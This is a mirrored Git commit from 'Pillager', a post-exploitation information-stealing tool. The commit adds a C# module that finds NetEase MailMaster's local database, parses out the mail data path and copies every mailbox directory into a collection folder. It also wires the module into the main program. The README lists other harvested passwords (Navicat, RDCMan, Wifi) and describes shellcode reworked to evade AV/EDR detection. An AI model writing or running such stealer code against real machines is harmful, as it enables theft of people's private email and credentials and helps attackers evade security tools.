qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add MailMaster 

添加网易邮箱大师
This commit is contained in:
Adminxe 2023-11-13 17:25:17 +08:00
parent 44a9b70b71
commit 28ad150167
4 changed files with 90 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

75
Pillager/Mails/MailMaster.cs Normal file
View File

@ -0,0 +1,75 @@
using Microsoft.Win32;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
namespace Pillager.Mails
{
internal class MailMaster
{
public static string MailName = "MailMaster";
private static string GetDataPath()
{
string sqlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\MailMaster\\data\\app.db");
if (!File.Exists(sqlpath)) return "";
string db_tempFile = Path.GetTempFileName();
try
{
File.Copy(sqlpath, db_tempFile, true);
byte[] configdb = File.ReadAllBytes(db_tempFile);
List<int> offsets = FindBytes(configdb, Encoding.UTF8.GetBytes("DataPath"));
foreach (int offset in offsets)
{
if (configdb[offset + 8] != 0x20)
{
int size = (int)Math.Round((configdb[offset - 1] - 13L) / 2.0);
byte[] bytes = configdb.Skip(offset + 8).Take(size).ToArray();
return Encoding.UTF8.GetString(bytes);
}
}
}
catch { }
File.Delete(db_tempFile);
return "";
}
public static List<int> FindBytes(byte[] src, byte[] find)
{
List<int> offsets = new List<int>();
if (src == null || find == null || src.Length == 0 || find.Length == 0 || find.Length > src.Length) return offsets;
for (int i = 0; i < src.Length - find.Length + 1; i++)
{
if (src[i] == find[0])
{
for (int m = 1; m < find.Length; m++)
{
if (src[i + m] != find[m]) break;
if (m == find.Length - 1) offsets.Add(i);
}
}
}
return offsets;
}
public static void Save(string path)
{
try
{
string sqlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\MailMaster\\data");
if (!Directory.Exists(sqlpath)) return;
string datapath = GetDataPath();
string savepath = Path.Combine(path, MailName);
Directory.CreateDirectory(savepath);
foreach (var directory in Directory.GetDirectories(datapath))
{
Methods.CopyDirectory(directory, Path.Combine(savepath, Path.GetFileName(directory)), true);
}
}
catch { }
}
}
}

1
Pillager/Pillager.csproj
View File

@ -67,6 +67,7 @@
<Compile Include="Helper\Tar.cs" />
<Compile Include="Helper\TripleDESHelper.cs" />
<Compile Include="Helper\VaultCli.cs" />
<Compile Include="Mails\MailMaster.cs" />
<Compile Include="Messengers\Enigma.cs" />
<Compile Include="Messengers\QQ.cs" />
<Compile Include="Messengers\Skype.cs" />

4
Pillager/Program.cs
View File

@ -1,6 +1,7 @@
using System.IO;
using Pillager.Browsers;
using Pillager.Helper;
using Pillager.Mails;
using Pillager.Messengers;
using Pillager.Others;
using Pillager.Tools;
@ -32,6 +33,9 @@ namespace Pillager
Navicat.Save(savepath);
RDCMan.Save(savepath);
//Mail
MailMaster.Save(savepath);
//Messengers
QQ.Save(savepath);
Telegram.Save(savepath);

10
README.md
View File

@ -55,6 +55,10 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
| Navicat | Password |
| RDCMan | Password |
| Mail | Support |
| :--------: | :------: |
| MailMaster | DataFile |
| Others | Support |
| :----: | :------: |
| Wifi | Password |
@ -80,6 +84,12 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
* 长期维护,有问题可以及时的反馈处理
* 使用魔改版本的Donut缩小shellcode体积使shellcode兼容.Net Framework v3.5/v4.x并去除AV/EDR对Donut提取的特征
## Contributors
<a href="https://github.com/qwqdanchun/Pillager/graphs/contributors">
<img src="https://contrib.rocks/image?repo=qwqdanchun/Pillager" />
</a>
## 404星链计划
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)